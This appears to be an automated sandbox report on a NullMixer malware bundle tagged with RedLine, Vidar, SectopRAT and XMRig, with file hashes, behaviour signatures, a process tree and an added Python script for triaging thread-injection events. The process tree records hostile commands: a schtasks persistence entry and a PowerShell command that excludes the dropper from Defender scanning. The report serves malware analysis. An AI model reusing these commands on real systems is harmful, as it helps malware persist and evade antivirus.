| SHA512 | 8e7a61d1e5208ed1809143a19d2b0f4affa20b80117a09f195fcca2d903979041cb30212932fe80561c31d8ec8ee5d8aa177d2e69504e5a16418dae3f35f03b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 740af178c8807886f77382c6a0bcb167 |
| SHA1 | 73b7d12c8f29b1e7d0ce420249039320fbedfe9f |
| SHA256 | 9bf11adf85c9a09c1d2aa3df19f0ee8bd3938b5d35cefdf5c436355d0ff9e39e |
| SHA512 | 882e6a4f75c021d66f5150f029b29eba2a5c6874f1091f1d8195095fdfb4387a11b9886c4212a1c48c25b1fa2139032ac39969d9d21222f5913e9030b3aa32bb |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ce75ec67429098a8e34149a6b07f666c |
| SHA1 | 36029e0c1dad47814a923ca1906a57e983e33204 |
| SHA256 | 70d7ab9afc1d778e828a956c644c0f0cb2a6aec3688b7038451678444e9d5c46 |
| SHA512 | 58548a0bb7a4306a3653cade59d50c10e7d21346973e5e52457e7476ee40b57a4b1ab06666ad35df623b827af07ed66bb44d72d748709b28613ec063add8fafa |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ab7e75accdb0dddb4378e3ffef914713 |
| SHA1 | 47934a23a6f5acac29155bfc5e0053c7ed964e68 |
| SHA256 | b13048a1140a44affb2f6f1652cccdba752417186f202528fee504f3d4284018 |
| SHA512 | 5f1a778a0487ed88e69e97390b4f7e1404f9888e7f3501337ba33b08b5e2eb7154bd93a7bad31a02238df8eaf817b284cd852c79d39d1cc302f1fe7faf09b111 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 940ec3c43a409e9e8cb7707bb397bc63 |
| SHA1 | 1711a242d8edd46a59b922ddbd2818d64567350d |
| SHA256 | c9affb6d76681684f4e05f1e60392a5ded5fd75e0e7560c6c4eb9163f93e712a |
| SHA512 | 79057d32b31d73ea17c013f127941cc13f7161d0aca873722569cd8e56f9998821f06d520f7f54a3d54750c58b2959be42c31a2ffdce40f14b3268e676d7a24d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | bf2b8babd1517ca2f37d53866fa8eb64 |
| SHA1 | 9f75708a8fac7789df3f18b27c0f99c039998eeb |
| SHA256 | 70d5b6161a5916f7b7fdfe5ffcff16cc69052acb58f12ac1607233e1a603372d |
| SHA512 | 1df4f9929c5979ac3a30545af04d948d57a497e90a41ed5a6df9d9f2636084d84dcc6fe7a01bd15d909e9a395b320dc3ccedea9ddfeac390744c167d88616e3a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
| MD5 | e4a68ac854ac5242460afd72481b2a44 |
| SHA1 | df3c24f9bfd666761b268073fe06d1cc8d4f82a4 |
| SHA256 | cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f |
| SHA512 | 5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c53f7d51a540b5cc7a64887cfc37b653 |
| SHA1 | 471c41bf9d3df27ecf94ceabf2cb1dd261ba864f |
| SHA256 | 0f4aeba46469f81e5602c6aecd1f6bba9310cfdeba104347870efeea2dc22968 |
| SHA512 | a13a39d544ab355ca4b1d98d50f158c4c690bbbe558c1fde0a2d0974acaef0a70a196e66f495b032807a66c388f8bdae4e339c4fa41794fb5cb4565d9a525098 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81af0655573bae6402ad1202df2d4d15 |
| SHA1 | bbbf6ed4a18581a3cbf86e9f0324f85eb7c66c7d |
| SHA256 | ba12cfe2d6c7749f881e571be5425aa6faf45531bcb40bd6b1be6abb435fccf2 |
| SHA512 | 74698be3a88a79d54e41502c59721e308fc5bea5d3a79dd2eba9b76c233a5fc4a5cdbebedc56453f2c04b94b8ff8f2c73d0c765e28e17d40cb50ad1edae7af6a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ecdf5a0a8b9a0d21535d862bf8fa28c9 |
| SHA1 | e5fa1d176fe45064abefc4460c009944bc96b923 |
| SHA256 | d97bfd8a447c7767a04cf6d124acc891357e3d8e5cd474c789d4d585290fb7d9 |
| SHA512 | 4d729d32d904e3762bad0100b7124ffc04c4fb9d8dd0e70403a92aa9c8a50ce80df1de8cabef12c381d2dfbe14230fe1eb4d2c52b58132182ddb799b4edc1e1b |
memory/2336-770-0x000000013F930000-0x000000013F936000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | ca60fb44436f4df836f36295ec6b0beb |
| SHA1 | 016ec87aeb336b40fa89ad7018bf41e55f2b7820 |
| SHA256 | 18e053ef80d03961959dea5c77b3c9271f50ab36f89950e5361230844b226240 |
| SHA512 | dd774a2197b3c3fc82a894625478c69858102a90ce5f9a6b8db7a1b94b57598726e6416257854bbdc8e6542ea9d75d333323339e1fbfcc891f523c20efadfd80 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 89489a173dd5d2d0764e0512fe893dd5 |
| SHA1 | 37ddd9ae26022a9f1efd2191d2e56be99eb95d22 |
| SHA256 | b1d2c97f15fceb8cbfcdb8941fb581c70b8d2de4a9e18c0d6e21ad6c35312490 |
| SHA512 | 7545ab9f550730f9bc4b26beb351e0b536cf0f89f909b746ff3e0261c31a24ba195af44b165fb5ba53ad79e12f2050f186eb8a430e882a8c57ee9048cb6cc46f |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | c9fc01202c7060350a8e5f2b0fdb2013 |
| SHA1 | cd1e0160177ca3aabf9c0d1be662ce8127747e3f |
| SHA256 | 417a6d935979067a4e420e34794dab74607bbdfa51d18fd588af16111d452c90 |
| SHA512 | fe84238656104d70b1d07bd7f9ad7bc0c59a07977c85642c6b0b6d6e09685c6f66e3b8c100c34073ee69cbe11be05500d6544c1d9780568b4cae5ca6e5682b2d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 81cda058bc34d4a3150bd4016e51cea0 |
| SHA1 | f12bd32b289d88c5653aeca766a10c2bfcd2933d |
| SHA256 | c51be7437622bcc0b39a7777b81436536dc84893395ec58d9df5d82b98bfd102 |
| SHA512 | 96c1fae38c77b92807a8e5f4b4756758d1d48a9e983bbe9740a31bbf7859e4ffdbbd55f789d93eba9510bfa067ea6673943f58495e37f6ea6517f0b269d122b0 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 2e51e35d8d30ad12bf15259e5b38e895 |
| SHA1 | 25e1a6406f507e4133a29b64a0fa1f6e0dedb920 |
| SHA256 | 6d6478f9d9766ecaebd1c5f98d03bda0cb9e92c6d8ecd96fc3cb1f26b2c57c58 |
| SHA512 | 6dbfc9b2b93b34d028ec2b3a586874ca92d91c339e279db721eeba522a57e3f52db0205b3b2d8caeea980eab79bdff870cc7a9dc753f185de3649dbc860af51e |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | bf6bd5253aef62752da181dc76f1ecca |
| SHA1 | 4e99aa95728b4cd95e5f60429354a820d5e00a68 |
| SHA256 | 2a705696f830323c2b3f3c3850f22007a1efbc4cfbf06d317f389a67cc3240a0 |
| SHA512 | b1ef3981889f8d48d1770de13e1539280b5dc045098393444604515cfd8d92f9052b932985cb82b96bfb0c464fbdc1cff3816b04058495a83bdb9c79562a2997 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | f32e3a5899bd1fb40609f2eb02d4f210 |
| SHA1 | 87db7c11afb7397ff90b4b55f7782c49c62afe3a |
| SHA256 | 99a05549611ea85b6fcc6ec0cb8c9b830a637af8a72d171f3cd44918b0b84901 |
| SHA512 | 6af21bce6ecad712a33880a708934f8a7e641ed985737261da485ccff9a518fdc4c666e95dfd2648bc6aefe4627b0d69198eb980cfcce4e2c9d4d872a9bc2e3a |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 12b062be1b3533eb2dc1870127f05673 |
| SHA1 | 5f6adb5b81db69628d155c965ffee5f02a4f7711 |
| SHA256 | 0a7d7ca5fb5c829406e424041714b9f27020ffc9df551bb3107e79f343c1f8d5 |
| SHA512 | 22522141c9f7ce2334915fd039d26594c5c68abd3a0f467397f41dba37588abcce7deff32113e2af284e337bb6fad5cc6d777bd05217af188cb77a11146c7413 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 337ec9f9e5b12c3cb6eff22708c4d311 |
| SHA1 | 3f360caf2ea1b8f8b1d5894c58fd1f959e00857c |
| SHA256 | 15d34e62f7111345e95cfc965eaa0945eb97dec4e09c67c77de6820cf91add9e |
| SHA512 | 4b62e056f15070b7b573c572ca4e6e4cdbc3e937846f8e3f070a7b34e50a8c06c8089cde17de0490a245e04bd7c8496d4e44eaa94844bfe2d520474ac736e330 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-12-06 12:12
Reported
2024-12-06 12:15
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
150s
Command Line
Signatures
NullMixer
Nullmixer family
PrivateLoader
Privateloader family
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
Vidar
Vidar family
Xmrig family
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
ASPack v2.12-2.42
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4948 set thread context of 2040 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |
| PID 3936 set thread context of 5796 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |
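The two SetThreadContext rows above are not the same event. In the first, 1cr.exe sets the thread context of another 1cr.exe process, the classic pattern of a loader launching a suspended copy of itself and redirecting its thread to an injected payload; in the second, services64.exe does the same to C:\Windows\explorer.exe, so the payload ends up running behind a trusted Windows image name. The distinction decides which process a responder dumps and what to compare it against. The script below is an added example for this page, not part of the report; the rows are constructed from the two table rows above, and the three "kind" labels are this editor's classification, not the sandbox's.

```python
"""Classify the SetThreadContext rows from this report's signature table.

Added example, not part of the sandbox report. The sample rows are
constructed from the two rows above; the "kind" labels are an analyst
heuristic, not sandbox output.
"""
import re

SAMPLE_ROWS = [
    r"| PID 4948 set thread context of 2040 | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe |",
    r"| PID 3936 set thread context of 5796 | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | C:\Windows\explorer.exe |",
]

EVENT = re.compile(r"PID (\d+) set thread context of (\d+)")


def parse_event(row):
    """Return the source/target PIDs and images plus an injection kind,
    or None for a row that is not a SetThreadContext event."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    m = EVENT.search(cells[0]) if cells else None
    if not m or len(cells) < 4:
        return None
    src, dst = cells[2], cells[3]
    if src.lower() == dst.lower():
        kind = "same-image"        # suspended copy of itself, RunPE-style
    elif re.match(r"c:\\windows\\", dst, re.I):
        kind = "windows-binary"    # payload hides behind a trusted image name
    else:
        kind = "cross-image"
    return {"src_pid": int(m.group(1)), "dst_pid": int(m.group(2)),
            "source": src, "target": dst, "kind": kind}


def dump_targets(rows):
    """PIDs whose memory should be acquired, with the on-disk file to diff
    the mapped image against: for every kind it is the *target* process."""
    targets = []
    for row in rows:
        event = parse_event(row)
        if event:
            targets.append((event["dst_pid"], event["target"], event["kind"]))
    return targets


if __name__ == "__main__":
    for pid, image, kind in dump_targets(SAMPLE_ROWS):
        print(f"dump PID {pid} ({kind}); compare mapped image with {image}")
```

For both kinds the process to acquire is the target, not the source: after SetThreadContext the source may exit, and the target's mapped image at its base address is what no longer matches the file on disk.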
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\winnetdriv.exe | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c caa4baaf544.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 621c13b77.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
6f1aa71747b4a291.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
24ebc9ce784c63.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
621c13b77.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
d55cc0d45c3a05.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
caa4baaf544.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
c0f099be1ace2.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3744 -ip 3744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 560
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe" -a
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2104 -ip 2104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1016 -ip 1016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 1056
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
